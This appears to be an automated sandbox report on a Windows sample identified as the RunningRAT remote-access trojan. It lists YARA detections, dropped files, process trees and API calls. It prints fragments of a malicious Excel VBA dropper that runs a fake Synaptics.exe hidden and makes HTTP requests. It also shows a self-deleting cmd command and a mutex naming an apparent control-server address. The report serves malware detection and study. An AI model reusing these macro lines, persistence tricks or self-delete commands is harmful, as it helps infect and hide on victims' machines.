                          Source: C:\Users\user\Desktop\._cache_blq.exe, type: DROPPEDMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: C:\Program Files (x86)\6795234.dll, type: DROPPEDMatched rule: Detects RunningRAT Author: ditekSHen
                          Source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPEDMatched rule: Detects RunningRAT Author: ditekSHen
                          Document contains an embedded VBA macro with suspicious strings
                          Source: OslfsL4J.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: OslfsL4J.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: OslfsL4J.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: OslfsL4J.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: OslfsL4J.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: OslfsL4J.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: OslfsL4J.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: OslfsL4J.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: OslfsL4J.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                          Source: OslfsL4J.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                          Source: OslfsL4J.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Source: XZXHAVGRAG.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: XZXHAVGRAG.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: XZXHAVGRAG.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: XZXHAVGRAG.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: XZXHAVGRAG.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: XZXHAVGRAG.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: XZXHAVGRAG.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: XZXHAVGRAG.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: XZXHAVGRAG.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                          Source: XZXHAVGRAG.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                          Source: XZXHAVGRAG.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Document contains an embedded VBA with functions possibly related to ADO stream file operations
                          Source: OslfsL4J.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Source: XZXHAVGRAG.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Document contains an embedded VBA with functions possibly related to HTTP operations
                          Source: OslfsL4J.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Source: XZXHAVGRAG.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                          Source: OslfsL4J.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: XZXHAVGRAG.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD5CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,10_2_00DD5CF1
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD40B1 NtQuerySystemInformation,10_2_00DD40B1
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD5D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,10_2_00DD5D6A
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD5911 PathIsRelativeW,RtlSetSearchPathMode,SearchPathW,GetFileAttributesW,CreateActCtxW,CreateActCtxWWorker,CreateActCtxWWorker,CreateActCtxWWorker,GetModuleHandleW,CreateActCtxWWorker,ActivateActCtx,SetWindowLongW,GetWindowLongW,GetWindow,memset,GetClassNameW,CompareStringW,GetWindow,GetWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,10_2_00DD5911
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD4136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,10_2_00DD4136
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_10001F48 strlen,OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,4_2_10001F48
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_10001FBD LoadLibraryA,GetProcAddress,memset,memset,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,WTSGetActiveConsoleSessionId,SetTokenInformation,CreateProcessAsUserA,CloseHandle,CloseHandle,FreeLibrary,4_2_10001FBD
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_100025A2 ExitWindowsEx,4_2_100025A2
                          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\encvbk.exeJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_054ED50B3_2_054ED50B
                          Source: OslfsL4J.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                          Source: OslfsL4J.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: XZXHAVGRAG.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                          Source: XZXHAVGRAG.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 7644 -ip 7644
                          Source: blq.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                          Source: blq.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                          Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: RCXAFD2.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs blq.exe
                          Source: blq.exe, 00000000.00000003.1661622575.00000000006F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameA-2? vs blq.exe
                          Source: blq.exe, 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs blq.exe
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exe, 00000000.00000003.1660121834.0000000000716000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exe, 00000000.00000003.1660433152.0000000000721000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exe, 00000000.00000003.1661622575.00000000006E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs blq.exe
                          Source: blq.exe, 00000000.00000000.1654787110.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exe, 00000000.00000000.1654787110.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs blq.exe
                          Source: blq.exe, 00000000.00000003.1660495410.00000000006BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs blq.exe
                          Source: blq.exe, 00000000.00000003.1660495410.00000000006F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs blq.exe
                          Source: blq.exe, 00000000.00000003.1660495410.00000000006F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs blq.exe
                          Source: ._cache_blq.exe, 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exeBinary or memory string: OriginalFileName vs blq.exe
                          Source: blq.exeBinary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exeBinary or memory string: OriginalFilenameb! vs blq.exe
                          Source: ._cache_blq.exe.0.drBinary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: blq.exe, type: SAMPLEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 10.2.encvbk.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 1.2.._cache_blq.exe.4032a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 1.0.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 1.0.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 0.3.blq.exe.748e74.0.raw.unpack, type: UNPACKEDPEMatched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.3.blq.exe.748e74.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 1.2.._cache_blq.exe.4032a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 4.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 0.3.blq.exe.748e74.0.unpack, type: UNPACKEDPEMatched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.3.blq.exe.748e74.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 0.0.blq.exe.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.0.blq.exe.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 0.0.blq.exe.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.0.blq.exe.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 1.2.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 0.0.blq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: C:\Users\user\Desktop\._cache_blq.exe, type: DROPPEDMatched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: C:\Users\user\Desktop\._cache_blq.exe, type: DROPPEDMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: C:\Program Files (x86)\6795234.dll, type: DROPPEDMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPEDMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: classification engineClassification label: mal100.bank.troj.expl.evad.winEXE@36/50@17/5
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD3C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,10_2_00DD3C66
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,_local_unwind2,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,ChangeServiceConfig2A,ChangeServiceConfig2A,wsprintfA,strlen,StartServiceA,4_2_10001B5B
                          Source: C:\Users\user\Desktop\._cache_blq.exeCode function: 1_2_00401794 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcmpiA,CloseHandle,FreeLibrary,1_2_00401794
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD205A CoCreateInstance,10_2_00DD205A
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_10001A43 OpenSCManagerA,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,QueryServiceStatus,Sleep,CloseServiceHandle,CloseServiceHandle,4_2_10001A43
                          Source: C:\Users\user\Desktop\._cache_blq.exeFile created: C:\Program Files (x86)\6795234.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeFile created: C:\Users\user\Desktop\._cache_blq.exeJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7644
                          Source: C:\Windows\SysWOW64\encvbk.exeMutant created: \Sessions\1\BaseNamedObjects\103.36.221.195:8790:encvbk
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\OslfsL4J.xlsmJump to behavior
                          Source: Yara matchFile source: blq.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.blq.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXAFD2.tmp, type: DROPPED
                          Source: C:\Windows\SysWOW64\encvbk.exeCommand line argument: WLDP.DLL10_2_00DD4136
                          Source: C:\Windows\SysWOW64\encvbk.exeCommand line argument: localserver10_2_00DD4136
                          Source: C:\Users\user\Desktop\blq.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\Desktop\blq.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: blq.exeReversingLabs: Detection: 92%
                          Source: C:\Users\user\Desktop\blq.exeFile read: C:\Users\user\Desktop\blq.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\blq.exe "C:\Users\user\Desktop\blq.exe"
                          Source: C:\Users\user\Desktop\blq.exeProcess created: C:\Users\user\Desktop\._cache_blq.exe "C:\Users\user\Desktop\._cache_blq.exe"
                          Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k "encvbk"
                          Source: C:\Users\user\Desktop\blq.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                          Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k "encvbk"
                          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\._cache_blq.exe"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\encvbk.exe C:\Windows\system32\encvbk.exe "c:\program files (x86)\6795234.dll",MainThread
                          Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 7644 -ip 7644
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 7644 -ip 7644
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16120
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16140
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7644 -ip 7644
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16196
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
                          Source: C:\Users\user\Desktop\blq.exeProcess created: C:\Users\user\Desktop\._cache_blq.exe "C:\Users\user\Desktop\._cache_blq.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\blq.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\._cache_blq.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\encvbk.exe C:\Windows\system32\encvbk.exe "c:\program files (x86)\6795234.dll",MainThreadJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 7644 -ip 7644
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 7644 -ip 7644
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16120
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16140
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7644 -ip 7644
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16196
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: twext.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: shacct.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: idstore.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: samlib.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: starttiledata.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: acppage.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: msi.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: aepic.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: sfc_os.dllJump to behavior
